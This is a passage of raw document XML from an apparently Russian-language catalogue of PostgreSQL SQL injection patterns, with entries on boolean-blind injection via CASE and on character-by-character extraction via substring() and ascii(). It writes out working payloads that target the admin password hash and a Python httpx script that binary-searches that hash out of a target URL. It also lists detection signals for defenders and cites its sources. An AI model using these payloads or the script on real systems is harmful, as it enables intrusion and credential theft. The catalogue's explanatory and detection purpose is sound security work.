      </w:pPr>
      <w:r>
        <w:t>Результаты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D985BAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Условие истинно → подзапрос возвращает 1 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id = 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → продукт с id=1 в ответе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6901F3E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Условие ложно → подзапрос возвращает 0 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id = 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → пустой результат.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF5FE7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в булевом контексте:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A30F600" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1 AND (CASE WHEN current_user = 'app_user' THEN TRUE ELSE FALSE END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635A29C0"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1 AND (CASE WHEN current_user = 'app_user' THEN TRUE ELSE FALSE END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15009D18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Истинно → возвращает продукт id=1, ложно → пустой ответ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53975C3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Атакующий получил бинарный oracle: каждый payload — это один вопрос «да/нет».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BA64AD"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CASE WHEN ... THEN ... ELSE ... END</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартное SQL-выражение, реализованное в PG в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/utils/adt/case.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это short-circuit конструкция. Тип результата — общий тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>THEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ELSE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ветвей, потому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>THEN 1 ELSE 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> корректно возвращает integer. В PG нет SQL-функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IF()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, поэтому весь boolean-blind строится на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B53CDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая версия PG. Никаких специальных привилегий. Главное условие — наблюдаемое различие в HTTP-ответе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC68B5"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CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — одна из самых распространённых SQL-конструкций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2079EF14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D5878B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN &lt;subquery&gt; THEN 1 ELSE 0 END</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в скалярном контексте, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;subquery&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обращается к таблице, не упомянутой во внешнем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABD9898" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t>-condition, где обе ветки — литералы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>THEN 1 ELSE 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>THEN TRUE ELSE FALSE</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7693C26D"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pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: поток запросов с одинаковой формой, отличающихся подстрокой сравнения внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D96D8AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Корреляция в логах: short response (пустой результат) и normal response (с данными) чередуются с одного клиента.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F035DDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3481CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.3.2, 3.3.3, 3.2.3, 3.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C64C794" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger SQL injection cheat sheet — Blind SQL injection; HackTricks: PostgreSQL injection — Boolean based; PostgreSQL Documentation: Conditional Expressions — CASE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61494976" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.3.2 Bit-by-bit extraction через `substring()` + `ascii()`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539425C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Когда нужно извлечь не один бит, а строку (хеш пароля, токен, имя), атакующий читает её по одному символу. Каждый символ — это число 0–255 (ASCII), которое можно угадать бинарным поиском: 7 запросов на ASCII. На 60-байтный bcrypt-хеш нужно ~420 HTTP-запросов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757960E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Тот же, что в 3.3.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C87B7E4"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0DA67960" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Шаг 1 — сравнение с серединой ASCII:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468B1FA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT CASE WHEN ascii(substring((SELECT password_hash FROM users WHERE login='admin'), 1, 1)) &gt; 64 THEN 1 ELSE 0 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624A4A51" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571200E8"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ascii(substring((SELECT password_hash FROM users WHERE login='admin'), 1, 1)) &gt; 64 THEN 1 ELSE 0 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B9AB4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Если первый символ имеет ASCII &gt; 64: результат 1, продукт с id=1 в ответе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EDC62C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Иначе: результат 0, пустой ответ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD862F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Готовый алгоритм на стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7159ADE4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import httpx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1870EFF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB21B50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def query_oracle(payload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECEA454" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r = httpx.get(f"http://target/products/{payload}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4883034E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return len(r.json()) &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6522AA8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF55CDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def extract_char(position):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F8068A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    lo, hi = 0, 127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1FB2F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    while lo &lt; hi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5121E84D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        mid = (lo + hi) // 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD9B6E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        payload = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674A8918" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            f"(SELECT CASE WHEN ascii(substring("</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A3B01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            f"(SELECT password_hash FROM users WHERE login='admin'), {position}, 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393674AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            f")) &gt; {mid} THEN 1 ELSE 0 END)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7926C61E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B72B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        if query_oracle(payload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCE692" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            lo = mid + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E62DD5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19790019" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            hi = mid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52059001" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return chr(lo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A72624C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Атакующий извлекает строку посимвольно за </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7 * len(string)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP-запросов. На bcrypt-хеш длиной 60 байт — порядка 420 запросов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5131DD5E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все три используемые функции — стандартные PG-функции: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
